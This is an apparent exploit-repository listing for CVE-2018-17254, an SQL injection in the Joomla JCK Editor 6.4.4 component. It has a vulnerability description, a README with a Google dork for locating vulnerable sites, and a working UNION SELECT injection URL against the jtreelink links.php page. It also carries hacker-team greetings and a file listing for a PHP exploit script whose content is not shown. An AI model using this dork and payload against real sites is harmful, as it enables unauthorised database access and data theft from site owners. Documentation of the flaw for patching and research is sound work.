CVE-2018-17254 PoC — Joomla! JCK Editor Component SQL Injection Vulnerability

Source
Associated Vulnerability
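Title: Joomla! JCK Editor Component SQL Injection Vulnerability (CVE-2018-17254)
Description: Joomla! is an open-source content management system (CMS) developed by the Open Source Matters team in the United States; it provides features such as RSS feeds and site search. JCK Editor is one of its editor components. A SQL injection vulnerability exists in version 6.4.4 of the Joomla! JCK Editor component. A remote attacker can exploit it to execute SQL commands by sending the 'parent' parameter to the jtreelink/dialogs/links.php page.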
Description
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
Readme
# CVE-2018-17254



<pre>
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
# Google Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10 Ubuntu Windows 11/10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254</pre>
Greettzz LXPLOIT - CUKIMAY CYBER TEAM
My Friends : Noniod7 - Ardzz
Recoded from : Hamza Megahed
https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html
File Snapshot

[4.0K] /data/pocs/e13bd93d822af7d188178cc7ec8f902f96bebe0d
├── [ 12K] CVE-2018-17254.php
└── [ 846] README.md

0 directories, 2 files